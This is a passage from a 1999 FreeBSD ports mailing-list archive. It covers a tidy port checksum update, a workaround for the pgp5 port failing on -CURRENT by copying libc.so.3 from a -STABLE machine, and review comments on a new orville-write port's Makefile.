tidy-0.11.99.2 CATEGORIES= www MASTER_SITES= http://www.w3.org/People/Raggett/ EXTRACT_SUFX= .tgz diff -ruN tidy/files/md5 tidy.new/files/md5 --- tidy/files/md5 Sat Dec 4 22:05:19 1999 +++ tidy.new/files/md5 Sat Dec 4 22:05:43 1999 @@ -1 +1 @@ -MD5 (tidy22oct99.tgz) = bef4ee086fc26dd209c02aea4108b81b +MD5 (tidy30nov99.tgz) = d527142aa7cb10eee1acc1c896c4e5ed >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 19:50:27 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5113D1508F for ; Sat, 4 Dec 1999 19:50:26 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA15570; Sat, 4 Dec 1999 19:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sat, 4 Dec 1999 19:50:01 -0800 (PST) Message-Id: <199912050350.TAA15570@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Chris Wicklein Subject: Re: ports/15102: pgp5 port is broken under -CURRENT Reply-To: Chris Wicklein Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15102; it has been noted by GNATS. From: Chris Wicklein To: freebsd-gnats-submit@freebsd.org, chrisw@wicklein.org Cc: chrisw@wicklein.org Subject: Re: ports/15102: pgp5 port is broken under -CURRENT Date: Sat, 4 Dec 1999 21:40:45 -0600 (CST) I neglected to mention with the original PR the obvious work-around: I built the pgp5 port on a machine tracking 3.3-STABLE, tgz'd /usr/ports/security/pgp5, ftp'd it to the -CURRENT machine, un-tgz'd it, mv'd it into the ports tree, and made install. Because it was built on a -STABLE machine, pgp5 required libc.so.3 which is currently missing from -CURRENT. Copying libc.so.3 from the -STABLE machine resolved this problem. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 20:30: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7FF62152AA for ; Sat, 4 Dec 1999 20:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA18447; Sat, 4 Dec 1999 20:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sat, 4 Dec 1999 20:30:02 -0800 (PST) Message-Id: <199912050430.UAA18447@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Bill Fumerola Subject: Re: ports/15264: New port: sysutils/orville-write Reply-To: Bill Fumerola Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15264; it has been noted by GNATS. From: Bill Fumerola To: howardjp@wam.umd.edu Cc: FreeBSD-gnats-submit@freebsd.org Subject: Re: ports/15264: New port: sysutils/orville-write Date: Sat, 4 Dec 1999 22:30:47 -0500 (EST) On Sat, 4 Dec 1999 howardjp@wam.umd.edu wrote: > X ${INSTALL_SCRIPT} ${WRKSRC}/amin.1 ${PREFIX}/man/man1/ > X ${INSTALL_SCRIPT} ${WRKSRC}/helpers.1 ${PREFIX}/man/man1/ > X ${INSTALL_SCRIPT} ${WRKSRC}/huh.1 ${PREFIX}/man/man1/ > X ${INSTALL_SCRIPT} ${WRKSRC}/write.1 ${PREFIX}/man/man1/ > X ${INSTALL_SCRIPT} ${WRKSRC}/mesg.1 ${PREFIX}/man/man1/ > X ${INSTALL_SCRIPT} ${WRKSRC}/chat.1 ${PREFIX}/man/man1/ > X ${INSTALL_SCRIPT} ${WRKSRC}/tel.1 ${PREFIX}/man/man1/ ${INSTALL_MAN} for these. > X-#LIB= > X+CFLAGS=-DBSD -DDISCONNECT -DTTY_GROUP \ > X+ -DWRTTMP='"/var/run/wrttmp"' \ > X+ -DWRTHIST='"/var/run/wrthist"' \ > X+ -DWRTTAB='"/usr/local/etc/wrttab"' \ Use some incantation of sed or perl to change it to ${PREFIX} and not /usr/local/ thanks, -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message